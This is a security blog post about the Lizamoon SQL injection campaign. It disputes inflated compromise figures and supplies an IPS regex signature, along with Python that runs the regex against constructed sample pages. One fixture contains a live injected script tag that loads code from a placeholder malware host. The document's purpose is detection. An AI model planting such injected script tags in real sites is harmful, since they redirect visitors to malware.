Lizamoon – Much Ado About Very Little?

Recent media reports have focused on a mass SQL injection attack involving a malware domain named lizamoon.com. While the lizamoon.com domain is new, this particular series of SQL injection compromises is actually several months old. Cisco ScanSafe logs record the first instance on 20-sep-10 21:58:08 GMT. Since then, various malware domains have been used for a total of 42 domains signifying 42 separate occurrences of these compromises since September 2010. Lizamoon.com was the 41st of these.

Cisco ScanSafe data reveals that from Sept 2010 to Feb 2011, all the compromises were on smaller, low traffic sites. Any encounters likely resulted from Web searches for very niche topic areas. As a result, the number of encounters with these compromised websites remained very low. Most importantly, this attacker is employing severe throttling such that only 0.15% of encounters even result in live content delivery. The remaining 99.85% of encounters are non-resolvable at the time of encounter. The result is a negligible rate of actual encounter with live content.

On March 25th, attackers deployed a new round of automated injections referencing lizamoon.com. At that time, a security firm conducted a Web search that led to the mistaken conclusion that a massive SQL injection was underway, which in turn led to considerable media focus. In turn, loosely defined search queries and misinterpretation of search results by interested parties led to unfounded claims that hundreds of thousands – and in one instance, 1.5 million – websites were compromised.

In fact, the number of sites compromised is considerably lower than claimed. Throughout the entire seven month run of these SQL injection attacks, Cisco ScanSafe has observed only 1154 unique compromised websites (Sep 20, 2010 – Mar 31, 2011).

Combined with the 0.15% live encounter rate, the risk from these SQL injection attacks remains negligible.

Regarding estimates of anywhere from 28,000, to 388,000 to 1.5M alleged compromises, here are a few further clarifications:

These estimates are based on Google searches. These searches are returning URLs – i.e. Web pages, not websites.

Many of the search queries have been very loosely defined, resulting in tens and hundreds of thousands of false positives in the count.

The search queries also return pages with people just talking about the SQL injection attacks – bloggers, forum posts, news articles, etc. The number of such pages grows substantially as word spreads, which can create the false impression that the number of compromises is rising dramatically.

Many of the search results contain properly escaped SQLi attempts, which are harmless, i.e. the script on those pages cannot run.

In the 0.15% of instances where the encounter does result in live content, the user is redirected to a second malware domain which attempts to install scareware. Cisco ScanSafe detects and blocks these attempts and has done so since the onset of the attacks seven months ago.

Custom IPS Signature For Lizamoon-related SQL Injection

Although the risk is extremely low, due to intense media interest, Cisco will provide IPS signature 35285-0 in signature update S557. This signature will detect hosts compromised by the Lizamoon SQL injection attack. If the sensor or CSM is configured to automatically download updates, the latest signature protection will be applied according to the configured update schedule. In the interim, customers can apply the following custom signature, which is equivalent to signature 35285-0. The engine parameters with green check marks are the parameters that should be modified. The image does not show the entire regular expression. The regular expression is “[\x3c]script\x20src[\x3d]http[\x3a][\x2f\x5c][\x2f\x5c][^\x20]*[\x2f][Uu][Rr][\x2e][Pp][Hh][Pp][\x3e][\x3c][\x2f]script[\x3e]”. Note that the web browser may wrap the regex; it must not contain any whitespace.
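As an added illustration, not code from Cisco or from this post, the same regular expression applied in Python to constructed page bodies: it fires on a live injected script tag and stays silent on an HTML-escaped copy and on a forum post merely discussing the attack, the two kinds of search hit that inflated the published counts. The host-capturing pattern, the function names and the sample URLs are my additions.

```python
import re

# Regex from Cisco signature 35285-0 as quoted above, kept as a raw string with no
# whitespace so every escape reaches the regex engine unchanged.
LIZAMOON_REGEX = (
    r"[\x3c]script\x20src[\x3d]http[\x3a][\x2f\x5c][\x2f\x5c]"
    r"[^\x20]*[\x2f][Uu][Rr][\x2e][Pp][Hh][Pp][\x3e][\x3c][\x2f]script[\x3e]"
)
LIZAMOON_PATTERN = re.compile(LIZAMOON_REGEX)

# Added here, not part of the signature: the same shape with a capture group around
# the host, so each hit can be attributed to one of the rotating malware domains.
HOST_PATTERN = re.compile(
    r"[\x3c]script\x20src[\x3d]http[\x3a][\x2f\x5c][\x2f\x5c]"
    r"([^\x20\x2f\x5c]+)[^\x20]*?[\x2f][Uu][Rr][\x2e][Pp][Hh][Pp][\x3e][\x3c][\x2f]script[\x3e]"
)


def find_injections(html: str) -> list[str]:
    """Return every live injected script reference in a page body, verbatim."""
    return [m.group(0) for m in LIZAMOON_PATTERN.finditer(html)]


def injected_hosts(html: str) -> list[str]:
    """Return the malware host referenced by each live (unescaped) injection."""
    return [m.group(1) for m in HOST_PATTERN.finditer(html)]


def scan_pages(pages: dict[str, str]) -> dict[str, list[str]]:
    """Map each page URL carrying a live injection to the hosts it references."""
    return {url: hosts for url, body in pages.items() if (hosts := injected_hosts(body))}


# Constructed sample pages (not real captures); "malware.example" is a placeholder host.
SAMPLE_PAGES = {
    # A database field rendered raw into the page: the script tag is live.
    "http://victim.example/catalog.asp?id=7":
        "<td>Widget</td><td>Blue<script src=http://malware.example/ur.php></script></td>",
    # The same payload HTML-escaped on output: it cannot run, and the signature
    # does not fire because there is no literal '<script'.
    "http://escaped.example/item.asp?id=7":
        "<td>Blue&lt;script src=http://malware.example/ur.php&gt;&lt;/script&gt;</td>",
    # A forum post discussing the attack: a search hit, but not a compromise.
    "http://forum.example/thread/lizamoon":
        "<p>Has anyone else seen the lizamoon.com SQL injection in their logs?</p>",
}

if __name__ == "__main__":
    for url, hosts in scan_pages(SAMPLE_PAGES).items():
        print(f"{url} -> {', '.join(hosts)}")
```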
